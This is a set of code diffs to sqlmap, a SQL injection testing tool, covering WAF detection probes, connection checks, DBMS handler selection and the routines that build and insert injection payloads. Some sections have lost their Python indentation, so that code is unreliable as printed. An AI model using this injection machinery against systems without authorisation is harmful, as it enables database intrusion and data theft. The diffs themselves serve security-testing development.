         warnMsg += "junk results, refer to user's manual paragraph "
-        warnMsg += "'Page comparison' and provide a string or regular "
-        warnMsg += "expression to match on"
+        warnMsg += "'Page comparison'"
         logger.warn(warnMsg)
 
         message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] "
@@ -1281,6 +1322,7 @@ def checkRegexp():
 
     return True
 
+@stackedmethod
 def checkWaf():
     """
     Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
@@ -1307,14 +1349,19 @@ def checkWaf():
     retVal = False
     payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
 
-    value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
-    value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
+    if PLACE.URI in conf.parameters:
+        place = PLACE.POST
+        value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
+    else:
+        place = PLACE.GET
+        value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
+        value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
 
     pushValue(conf.timeout)
     conf.timeout = IDS_WAF_CHECK_TIMEOUT
 
     try:
-        retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
+        retVal = Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, disableTampering=True)[1] < IDS_WAF_CHECK_RATIO
     except SqlmapConnectionException:
         retVal = True
     finally:
@@ -1341,6 +1388,7 @@ def checkWaf():
 
     return retVal
 
+@stackedmethod
 def identifyWaf():
     if not conf.identifyWaf:
         return None
@@ -1374,6 +1422,9 @@ def identifyWaf():
     retVal = []
 
     for function, product in kb.wafFunctions:
+        if retVal and "unknown" in product.lower():
+            continue
+
         try:
             logger.debug("checking for WAF/IPS/IDS product '%s'" % product)
             found = function(_)
@@ -1400,7 +1451,7 @@ def identifyWaf():
             message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename
             message += "If you know the details on used protection please "
             message += "report it along with specific response "
-            message += "to 'dev@sqlmap.org'"
+            message += "to '%s'" % DEV_EMAIL_ADDRESS
             logger.warn(message)
 
             message = "are you sure that you want to "
@@ -1422,6 +1473,7 @@ def identifyWaf():
 
     return retVal
 
+@stackedmethod
 def checkNullConnection():
     """
     Reference: http://www.wisec.it/sectou.php?id=472f952d79293
@@ -1433,16 +1485,16 @@ def checkNullConnection():
     infoMsg = "testing NULL connection to the target URL"
     logger.info(infoMsg)
 
-    try:
-        pushValue(kb.pageCompress)
-        kb.pageCompress = False
+    pushValue(kb.pageCompress)
+    kb.pageCompress = False
 
-        page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
+    try:
+        page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD, raise404=False)
 
         if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
             kb.nullConnection = NULLCONNECTION.HEAD
 
-            infoMsg = "NULL connection is supported with HEAD method (Content-Length)"
+            infoMsg = "NULL connection is supported with HEAD method ('Content-Length')"
             logger.info(infoMsg)
         else:
             page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})
@@ -1450,11 +1502,10 @@ def checkNullConnection():
             if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
                 kb.nullConnection = NULLCONNECTION.RANGE
 
-                infoMsg = "NULL connection is supported with GET method (Range)"
-                infoMsg += "'%s'" % kb.nullConnection
+                infoMsg = "NULL connection is supported with GET method ('Range')"
                 logger.info(infoMsg)
             else:
-                _, headers, _ = Request.getPage(skipRead = True)
+                _, headers, _ = Request.getPage(skipRead=True)
 
                 if HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
                     kb.nullConnection = NULLCONNECTION.SKIP_READ
@@ -1462,9 +1513,8 @@ def checkNullConnection():
                     infoMsg = "NULL connection is supported with 'skip-read' method"
                     logger.info(infoMsg)
 
-    except SqlmapConnectionException, ex:
-        errMsg = getSafeExString(ex)
-        raise SqlmapConnectionException(errMsg)
+    except SqlmapConnectionException:
+        pass
 
     finally:
         kb.pageCompress = popValue()
@@ -1472,18 +1522,19 @@ def checkNullConnection():
     return kb.nullConnection is not None
 
 def checkConnection(suppressOutput=False):
-    if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
-        try:
-            debugMsg = "resolving hostname '%s'" % conf.hostname
-            logger.debug(debugMsg)
-            socket.getaddrinfo(conf.hostname, None)
-        except socket.gaierror:
-            errMsg = "host '%s' does not exist" % conf.hostname
-            raise SqlmapConnectionException(errMsg)
-        except socket.error, ex:
-            errMsg = "problem occurred while "
-            errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
-            raise SqlmapConnectionException(errMsg)
+    if not re.search(r"\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z", conf.hostname):
+        if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
+            try:
+                debugMsg = "resolving hostname '%s'" % conf.hostname
+                logger.debug(debugMsg)
+                socket.getaddrinfo(conf.hostname, None)
+            except socket.gaierror:
+                errMsg = "host '%s' does not exist" % conf.hostname
+                raise SqlmapConnectionException(errMsg)
+            except socket.error, ex:
+                errMsg = "problem occurred while "
+                errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
+                raise SqlmapConnectionException(errMsg)
 
     if not suppressOutput and not conf.dummy and not conf.offline:
         infoMsg = "testing connection to the target URL"
@@ -1504,12 +1555,22 @@ def checkConnection(suppressOutput=False):
                 warnMsg += "which could interfere with the results of the tests"
                 logger.warn(warnMsg)
             elif wasLastResponseHTTPError():
-                warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
-                warnMsg += "which could interfere with the results of the tests"
-                logger.warn(warnMsg)
+                if getLastRequestHTTPError() != conf.ignoreCode:
+                    warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
+                    warnMsg += "which could interfere with the results of the tests"
+                    logger.warn(warnMsg)
             else:
                 kb.errorIsNone = True
 
+        threadData = getCurrentThreadData()
+
+        if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:
+            if (threadData.lastRedirectURL[1] or "").startswith("https://") and unicodeencode(conf.hostname) in threadData.lastRedirectURL[1]:
+                conf.url = re.sub(r"https?://", "https://", conf.url)
+                match = re.search(r":(\d+)", threadData.lastRedirectURL[1])
+                port = match.group(1) if match else 443
+                conf.url = re.sub(r":\d+/", ":%s/" % port, conf.url)
+
     except SqlmapConnectionException, ex:
         if conf.ipv6:
             warnMsg = "check connection to a provided "
@@ -1540,8 +1601,8 @@ def checkInternet():
     content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]
     return CHECK_INTERNET_VALUE in (content or "")
 
-def setVerbosity():  # Cross-linked function
+def setVerbosity():  # Cross-referenced function
     raise NotImplementedError
 
-def setWafFunctions():  # Cross-linked function
+def setWafFunctions():  # Cross-referenced function
     raise NotImplementedError
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 import os
@@ -43,6 +43,7 @@ from lib.core.common import urldecode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.decorators import stackedmethod
 from lib.core.enums import CONTENT_TYPE
 from lib.core.enums import HASHDB_KEYS
 from lib.core.enums import HEURISTIC_TEST
@@ -152,12 +153,15 @@ def _formatInjection(inj):
             vector = "%s%s" % (vector, comment)
         data += "    Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
         data += "    Title: %s\n" % title
-        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
+        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", spaceplus=(inj.place != PLACE.GET and kb.postSpaceToPlus))
         data += "    Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
 
     return data
 
 def _showInjections():
+    if conf.wizard and kb.wizardMode:
+        kb.wizardMode = False
+
     if kb.testQueryCount > 0:
         header = "sqlmap identified the following injection point(s) with "
         header += "a total of %d HTTP(s) requests" % kb.testQueryCount
@@ -242,12 +246,15 @@ def _saveToResultsFile():
     for key, value in results.items():
         place, parameter, notes = key
         line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep)
-        conf.resultsFP.writelines(line)
+        conf.resultsFP.write(line)
 
     if not results:
         line = "%s,,,,%s" % (conf.url, os.linesep)
-        conf.resultsFP.writelines(line)
+        conf.resultsFP.write(line)
 
+    conf.resultsFP.flush()
+
+@stackedmethod
 def start():
     """
     This function calls a function that performs checks on both URL
@@ -281,7 +288,7 @@ def start():
|
|||||||
try:
|
try:
|
||||||
|
|
||||||
if conf.checkInternet:
|
if conf.checkInternet:
|
||||||
infoMsg = "[INFO] checking for Internet connection"
|
infoMsg = "checking for Internet connection"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
if not checkInternet():
|
if not checkInternet():
|
||||||
@@ -366,9 +373,8 @@ def start():
|
|||||||
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
||||||
|
|
||||||
else:
|
else:
|
||||||
if targetUrl.find("?") > -1:
|
if '?' in targetUrl:
|
||||||
firstPart = targetUrl[:targetUrl.find("?")]
|
firstPart, secondPart = targetUrl.split('?', 1)
|
||||||
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
|
||||||
message = "Edit GET data [default: %s]: " % secondPart
|
message = "Edit GET data [default: %s]: " % secondPart
|
||||||
test = readInput(message, default=secondPart)
|
test = readInput(message, default=secondPart)
|
||||||
test = _randomFillBlankFields(test)
|
test = _randomFillBlankFields(test)
|
||||||
@@ -402,8 +408,7 @@ def start():
|
|||||||
if conf.nullConnection:
|
if conf.nullConnection:
|
||||||
checkNullConnection()
|
checkNullConnection()
|
||||||
|
|
||||||
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
|
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
|
||||||
and (kb.injection.place is None or kb.injection.parameter is None):
|
|
||||||
|
|
||||||
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
||||||
# NOTE: this is not needed anymore, leaving only to display
|
# NOTE: this is not needed anymore, leaving only to display
|
||||||
@@ -581,11 +586,11 @@ def start():
|
|||||||
errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"
|
errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"
|
||||||
raise SqlmapNoneDataException(errMsg)
|
raise SqlmapNoneDataException(errMsg)
|
||||||
else:
|
else:
|
||||||
errMsg = "all tested parameters appear to be not injectable."
|
errMsg = "all tested parameters do not appear to be injectable."
|
||||||
|
|
||||||
if conf.level < 5 or conf.risk < 3:
|
if conf.level < 5 or conf.risk < 3:
|
||||||
errMsg += " Try to increase '--level'/'--risk' values "
|
errMsg += " Try to increase values for '--level'/'--risk' options "
|
||||||
errMsg += "to perform more tests."
|
errMsg += "if you wish to perform more tests."
|
||||||
|
|
||||||
if isinstance(conf.tech, list) and len(conf.tech) < 5:
|
if isinstance(conf.tech, list) and len(conf.tech) < 5:
|
||||||
errMsg += " Rerun without providing the option '--technique'."
|
errMsg += " Rerun without providing the option '--technique'."
|
||||||
@@ -608,15 +613,9 @@ def start():
|
|||||||
|
|
||||||
if kb.heuristicTest == HEURISTIC_TEST.POSITIVE:
|
if kb.heuristicTest == HEURISTIC_TEST.POSITIVE:
|
||||||
errMsg += " As heuristic test turned out positive you are "
|
errMsg += " As heuristic test turned out positive you are "
|
||||||
errMsg += "strongly advised to continue on with the tests. "
|
errMsg += "strongly advised to continue on with the tests."
|
||||||
errMsg += "Please, consider usage of tampering scripts as "
|
|
||||||
errMsg += "your target might filter the queries."
|
|
||||||
|
|
||||||
if not conf.string and not conf.notString and not conf.regexp:
|
if conf.string:
|
||||||
errMsg += " Also, you can try to rerun by providing "
|
|
||||||
errMsg += "either a valid value for option '--string' "
|
|
||||||
errMsg += "(or '--regexp')."
|
|
||||||
elif conf.string:
|
|
||||||
errMsg += " Also, you can try to rerun by providing a "
|
errMsg += " Also, you can try to rerun by providing a "
|
||||||
errMsg += "valid value for option '--string' as perhaps the string you "
|
errMsg += "valid value for option '--string' as perhaps the string you "
|
||||||
errMsg += "have chosen does not match "
|
errMsg += "have chosen does not match "
|
||||||
@@ -629,8 +628,8 @@ def start():
|
|||||||
|
|
||||||
if not conf.tamper:
|
if not conf.tamper:
|
||||||
errMsg += " If you suspect that there is some kind of protection mechanism "
|
errMsg += " If you suspect that there is some kind of protection mechanism "
|
||||||
errMsg += "involved (e.g. WAF) maybe you could retry "
|
errMsg += "involved (e.g. WAF) maybe you could try to use "
|
||||||
errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
|
errMsg += "option '--tamper' (e.g. '--tamper=space2comment')"
|
||||||
|
|
||||||
raise SqlmapNotVulnerableException(errMsg.rstrip('.'))
|
raise SqlmapNotVulnerableException(errMsg.rstrip('.'))
|
||||||
else:
|
else:
|
||||||
|
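The GET-data edit above now uses str.split with a maxsplit of 1, which yields exactly the same two parts as the earlier find()-based slicing whenever the URL contains a '?'. A quick check with a made-up URL:

targetUrl = "http://www.site.com/index.php?id=1&cat=2"

firstPart = targetUrl[:targetUrl.find("?")]            # old approach
secondPart = targetUrl[targetUrl.find("?") + 1:]

newFirst, newSecond = targetUrl.split('?', 1)          # new approach

assert (firstPart, secondPart) == (newFirst, newSecond)
print(newFirst)   # http://www.site.com/index.php
print(newSecond)  # id=1&cat=2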
@@ -1,8 +1,8 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
"""

from lib.core.common import Backend

@@ -56,19 +56,19 @@ def setHandler():
"""

items = [
(DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
(DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
(DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
(DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
(DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
(DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
(DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
]

_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
if _:

@@ -76,6 +76,16 @@ def setHandler():
items.insert(0, _)

for dbms, aliases, Handler, Connector in items:
+if conf.forceDbms:
+if conf.forceDbms.lower() not in aliases:
+continue
+else:
+kb.dbms = conf.dbms = conf.forceDbms = dbms

+if kb.dbmsFilter:
+if dbms not in kb.dbmsFilter:
+continue

handler = Handler()
conf.dbmsConnector = Connector()

@@ -96,7 +106,7 @@ def setHandler():
else:
conf.dbmsConnector.connect()

-if handler.checkDbms():
+if conf.forceDbms == dbms or handler.checkDbms():
if kb.resolutionDbms:
conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
else:
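The new --force-dbms branch in setHandler() skips every handler whose alias list does not contain the forced value, instead of probing each backend in turn. A simplified sketch of that selection logic; the alias data below is invented for illustration and much shorter than sqlmap's real *_ALIASES tuples:

items = [
    ("MySQL", ("mysql", "mariadb")),
    ("PostgreSQL", ("postgresql", "pgsql", "postgres")),
    ("Microsoft SQL Server", ("mssql", "sqlserver")),
]

def pick_handler(force_dbms=None):
    for dbms, aliases in items:
        if force_dbms and force_dbms.lower() not in aliases:
            continue  # forced DBMS does not match this handler, skip it entirely
        return dbms   # first surviving handler wins (the real code still runs checkDbms())
    return None

print(pick_handler("pgsql"))  # PostgreSQL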
@@ -1,8 +1,8 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
"""

pass
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@@ -39,6 +39,7 @@ from lib.core.settings import BOUNDED_INJECTION_MARKER
|
|||||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import GENERIC_SQL_COMMENT
|
from lib.core.settings import GENERIC_SQL_COMMENT
|
||||||
|
from lib.core.settings import INFERENCE_MARKER
|
||||||
from lib.core.settings import NULL
|
from lib.core.settings import NULL
|
||||||
from lib.core.settings import PAYLOAD_DELIMITER
|
from lib.core.settings import PAYLOAD_DELIMITER
|
||||||
from lib.core.settings import REPLACEMENT_MARKER
|
from lib.core.settings import REPLACEMENT_MARKER
|
||||||
@@ -96,6 +97,7 @@ class Agent(object):
|
|||||||
paramString = conf.parameters[place]
|
paramString = conf.parameters[place]
|
||||||
paramDict = conf.paramDict[place]
|
paramDict = conf.paramDict[place]
|
||||||
origValue = getUnicode(paramDict[parameter])
|
origValue = getUnicode(paramDict[parameter])
|
||||||
|
newValue = getUnicode(newValue) if newValue else newValue
|
||||||
|
|
||||||
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
|
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
|
||||||
paramString = origValue
|
paramString = origValue
|
||||||
@@ -104,7 +106,7 @@ class Agent(object):
|
|||||||
else:
|
else:
|
||||||
origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
|
origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
|
||||||
origValue = origValue[origValue.rfind('/') + 1:]
|
origValue = origValue[origValue.rfind('/') + 1:]
|
||||||
for char in ('?', '=', ':'):
|
for char in ('?', '=', ':', ','):
|
||||||
if char in origValue:
|
if char in origValue:
|
||||||
origValue = origValue[origValue.rfind(char) + 1:]
|
origValue = origValue[origValue.rfind(char) + 1:]
|
||||||
elif place == PLACE.CUSTOM_POST:
|
elif place == PLACE.CUSTOM_POST:
|
||||||
@@ -113,15 +115,15 @@ class Agent(object):
|
|||||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
||||||
origValue = origValue.split('>')[-1]
|
origValue = origValue.split('>')[-1]
|
||||||
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
|
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
|
||||||
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
|
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)[\s:]*(?P<result>[^"\[,]+\Z)', origValue)
|
||||||
else:
|
else:
|
||||||
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
|
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
|
||||||
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
||||||
elif place == PLACE.CUSTOM_HEADER:
|
elif place == PLACE.CUSTOM_HEADER:
|
||||||
paramString = origValue
|
paramString = origValue
|
||||||
origValue = origValue.split(kb.customInjectionMark)[0]
|
|
||||||
origValue = origValue[origValue.find(',') + 1:]
|
origValue = origValue[origValue.find(',') + 1:]
|
||||||
match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
|
origValue = origValue.split(kb.customInjectionMark)[0]
|
||||||
|
match = re.search(r"([^;]+)=(?P<value>[^;]*);?\Z", origValue)
|
||||||
if match:
|
if match:
|
||||||
origValue = match.group("value")
|
origValue = match.group("value")
|
||||||
elif ',' in paramString:
|
elif ',' in paramString:
|
||||||
@@ -137,10 +139,10 @@ class Agent(object):
|
|||||||
value = origValue
|
value = origValue
|
||||||
elif where == PAYLOAD.WHERE.NEGATIVE:
|
elif where == PAYLOAD.WHERE.NEGATIVE:
|
||||||
if conf.invalidLogical:
|
if conf.invalidLogical:
|
||||||
match = re.search(r'\A[^ ]+', newValue)
|
match = re.search(r"\A[^ ]+", newValue)
|
||||||
newValue = newValue[len(match.group() if match else ""):]
|
newValue = newValue[len(match.group() if match else ""):]
|
||||||
_ = randomInt(2)
|
_ = randomInt(2)
|
||||||
value = "%s%s AND %s=%s" % (origValue, match.group() if match else "", _, _ + 1)
|
value = "%s%s AND %s LIKE %s" % (origValue, match.group() if match else "", _, _ + 1)
|
||||||
elif conf.invalidBignum:
|
elif conf.invalidBignum:
|
||||||
value = randomInt(6)
|
value = randomInt(6)
|
||||||
elif conf.invalidString:
|
elif conf.invalidString:
|
||||||
@@ -169,8 +171,7 @@ class Agent(object):
|
|||||||
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
|
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
|
||||||
retVal = retVal.replace(kb.customInjectionMark, "").replace(REPLACEMENT_MARKER, kb.customInjectionMark)
|
retVal = retVal.replace(kb.customInjectionMark, "").replace(REPLACEMENT_MARKER, kb.customInjectionMark)
|
||||||
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
|
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
|
||||||
_ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
|
retVal = paramString.replace("%s%s" % (origValue, BOUNDED_INJECTION_MARKER), self.addPayloadDelimiters(newValue))
|
||||||
retVal = "%s=%s" % (re.sub(r" (\#\d\*|\(.+\))\Z", "", parameter), paramString.replace(_, self.addPayloadDelimiters(newValue)))
|
|
||||||
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
||||||
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
||||||
else:
|
else:
|
||||||
@@ -197,7 +198,7 @@ class Agent(object):
|
|||||||
regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
|
regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
|
||||||
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
||||||
else:
|
else:
|
||||||
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), r"%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
||||||
|
|
||||||
if retVal == paramString and urlencode(parameter) != parameter:
|
if retVal == paramString and urlencode(parameter) != parameter:
|
||||||
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString)
|
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString)
|
||||||
@@ -207,16 +208,6 @@ class Agent(object):
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def fullPayload(self, query):
|
|
||||||
if conf.direct:
|
|
||||||
return self.payloadDirect(query)
|
|
||||||
|
|
||||||
query = self.prefixQuery(query)
|
|
||||||
query = self.suffixQuery(query)
|
|
||||||
payload = self.payload(newValue=query)
|
|
||||||
|
|
||||||
return payload
|
|
||||||
|
|
||||||
def prefixQuery(self, expression, prefix=None, where=None, clause=None):
|
def prefixQuery(self, expression, prefix=None, where=None, clause=None):
|
||||||
"""
|
"""
|
||||||
This method defines how the input expression has to be escaped
|
This method defines how the input expression has to be escaped
|
||||||
@@ -303,24 +294,28 @@ class Agent(object):
|
|||||||
if payload is None:
|
if payload is None:
|
||||||
return
|
return
|
||||||
|
|
||||||
_ = (
|
replacements = (
|
||||||
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
|
("[DELIMITER_START]", kb.chars.start),
|
||||||
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
|
("[DELIMITER_STOP]", kb.chars.stop),
|
||||||
("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
|
("[AT_REPLACE]", kb.chars.at),
|
||||||
)
|
("[SPACE_REPLACE]", kb.chars.space),
|
||||||
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
|
("[DOLLAR_REPLACE]", kb.chars.dollar),
|
||||||
|
("[HASH_REPLACE]", kb.chars.hash_),
|
||||||
|
("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
|
||||||
|
)
|
||||||
|
payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload)
|
||||||
|
|
||||||
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
|
for _ in set(re.findall(r"(?i)\[RANDNUM(?:\d+)?\]", payload)):
|
||||||
payload = payload.replace(_, str(randomInt()))
|
payload = payload.replace(_, str(randomInt()))
|
||||||
|
|
||||||
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
|
for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)):
|
||||||
payload = payload.replace(_, randomStr())
|
payload = payload.replace(_, randomStr())
|
||||||
|
|
||||||
if origValue is not None and "[ORIGVALUE]" in payload:
|
if origValue is not None and "[ORIGVALUE]" in payload:
|
||||||
origValue = getUnicode(origValue)
|
origValue = getUnicode(origValue)
|
||||||
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
|
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
|
||||||
|
|
||||||
if "[INFERENCE]" in payload:
|
if INFERENCE_MARKER in payload:
|
||||||
if Backend.getIdentifiedDbms() is not None:
|
if Backend.getIdentifiedDbms() is not None:
|
||||||
inference = queries[Backend.getIdentifiedDbms()].inference
|
inference = queries[Backend.getIdentifiedDbms()].inference
|
||||||
|
|
||||||
@@ -332,7 +327,7 @@ class Agent(object):
|
|||||||
else:
|
else:
|
||||||
inferenceQuery = inference.query
|
inferenceQuery = inference.query
|
||||||
|
|
||||||
payload = payload.replace("[INFERENCE]", inferenceQuery)
|
payload = payload.replace(INFERENCE_MARKER, inferenceQuery)
|
||||||
elif not kb.testMode:
|
elif not kb.testMode:
|
||||||
errMsg = "invalid usage of inference payload without "
|
errMsg = "invalid usage of inference payload without "
|
||||||
